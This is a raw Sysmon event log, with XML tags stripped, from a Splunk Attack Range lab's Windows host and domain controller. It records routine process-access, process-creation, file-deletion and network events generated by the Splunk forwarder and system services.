Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215042Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:45.159{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215041Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:45.159{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215040Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:45.159{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215039Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:45.159{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215038Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:45.159{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215037Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:45.159{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215036Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:45.159{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215035Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:45.159{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215034Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:45.159{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215033Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:45.159{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-0F69-6216-1804-000000003902}4004C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215032Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:45.159{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0F69-6216-1804-000000003902}4004C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215031Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:45.160{4F8D34B0-0F69-6216-1804-000000003902}4004C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000215030Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:45.003{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99888CED8EE31935E34FCE06208E8B3F,SHA256=056BDFD7AB7A0972EB8173C9140838223D8CDE4B8CF6462D0E7A8ED19C74FBEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286083Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:46.442{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=778A5E088A0D48394D19B1BEAC80C7CB,SHA256=95895E550F66E5542B7FF82964162D399DF7C9B93D2F314D7EFFD7ACF4FFF143,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215063Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:46.190{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3B465BF5966D3A49AC19DDA2C2923277,SHA256=8E4758022214B25D5F7831893135B81BCEC3D7CFF89A03755EC7EA8C7FDF6743,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215062Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:46.190{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BE63D3F28BC1DE7CF2051909F507EC0C,SHA256=928BC53B0185EF61C99E489022005D47434B06532CF88967E9E7679A5D42C277,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215061Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:46.081{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8AA532A7470E989AF7FC03C666F4E52,SHA256=ED8B266B209BEDDDE95F3FDA7A542AA934FA1506DE0A5774BD1199262A309BD5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215060Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:46.002{4F8D34B0-0F69-6216-1904-000000003902}26962832C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000286084Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:47.489{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00408AC4490CD7F92DFBBFF4D9DA7E03,SHA256=1DCCB68E31C148E623C6F6C5F0E3A3E21F2054CC45D3BDF5677B8C6B64172C3F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215091Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:45.221{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51233-false10.0.1.12-8089- 10341000x8000000000000000215090Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:47.878{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0F6B-6216-1B04-000000003902}1036C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215089Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:47.878{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215088Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:47.878{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215087Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:47.878{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215086Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:47.878{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215085Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:47.878{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215084Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:47.878{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215083Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:47.878{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215082Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 